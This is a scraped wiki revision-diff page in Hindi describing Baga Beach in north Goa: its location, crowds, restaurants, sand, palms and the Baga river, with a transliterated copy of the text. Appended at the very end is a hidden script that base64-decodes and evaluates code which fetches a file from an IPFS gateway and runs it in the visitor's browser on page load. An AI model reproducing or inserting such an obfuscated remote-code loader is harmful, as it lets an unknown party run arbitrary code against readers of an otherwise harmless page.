Difference between revisions of "बागा तट गोवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[चित्र:Baga-Beach-Goa.jpg|thumb|250px|बागा तट, [[गोवा]]<br />Baga Beach, Goa]]
 
[[चित्र:Baga-Beach-Goa.jpg|thumb|250px|बागा तट, [[गोवा]]<br />Baga Beach, Goa]]
 +
'''बागा तट''' उत्तरी गोवा में स्थित है। यह गोवा की राजधानी [[पणजी]] से 16 किलोमीटर दूर है और मापुसा से 9 किलोमीटर दूर है। यह गोवा का सबसे भीड़ भरा और प्रसिद्ध तट है। इसके आस-पास उम्दा रेस्त्रां और होटल है। 
 
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं। गोवा एक आकर्षक [[गोवा पर्यटन|पर्यटन]] स्थल है।
 
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं। गोवा एक आकर्षक [[गोवा पर्यटन|पर्यटन]] स्थल है।
 
*इस तट को [[मछली]] पकड़ने, धूप में लेटने और पैडल बोट के लिए आदर्श तट माना जाता है।  
 
*इस तट को [[मछली]] पकड़ने, धूप में लेटने और पैडल बोट के लिए आदर्श तट माना जाता है।  
Line 5: Line 6:
 
*इस तट के एक ओर बागा नदी है जो बच्‍चों तथा जल प्रेमियों के लिए एक सुंदर स्‍थान है।  
 
*इस तट के एक ओर बागा नदी है जो बच्‍चों तथा जल प्रेमियों के लिए एक सुंदर स्‍थान है।  
 
*बागा तट पर नदी और समुद्र के मिलने के स्‍थान पर काली चट्टाने हैं जो समुद्र के टकराने से सुंदर फुहारे पैदा करती हैं।
 
*बागा तट पर नदी और समुद्र के मिलने के स्‍थान पर काली चट्टाने हैं जो समुद्र के टकराने से सुंदर फुहारे पैदा करती हैं।
 +
 
[[चित्र:Goa-Beach.jpg|thumb|600px|center|बागा तट, [[गोवा]]<br />Baga Beach, Goa]]
 
[[चित्र:Goa-Beach.jpg|thumb|600px|center|बागा तट, [[गोवा]]<br />Baga Beach, Goa]]
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 07:35, 16 October 2011

[[chitr:Baga-Beach-Goa.jpg|thumb|250px|baga tat, gova
Baga Beach, Goa]] baga tat uttari gova mean sthit hai. yah gova ki rajadhani panaji se 16 kilomitar door hai aur mapusa se 9 kilomitar door hai. yah gova ka sabase bhi d bhara aur prasiddh tat hai. isake as-pas umda restraan aur hotal hai.

  • gova ko 'paryatakoan ka sh‍varg' kahate haian. gova ek akarshak paryatan sthal hai.
  • is tat ko machhali pak dane, dhoop mean letane aur paidal bot ke lie adarsh tat mana jata hai.
  • baga tat apani bhoori ret aur pam ke pe doan se paryatakoan ko akarshit karata hai jo pani ke kinare kafi nazadik a jate haian.
  • is tat ke ek or baga nadi hai jo bachh‍choan tatha jal premiyoan ke lie ek suandar sh‍than hai.
  • baga tat par nadi aur samudr ke milane ke sh‍than par kali chattane haian jo samudr ke takarane se suandar phuhare paida karati haian.

[[chitr:Goa-Beach.jpg|thumb|600px|center|baga tat, gova
Baga Beach, Goa]]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>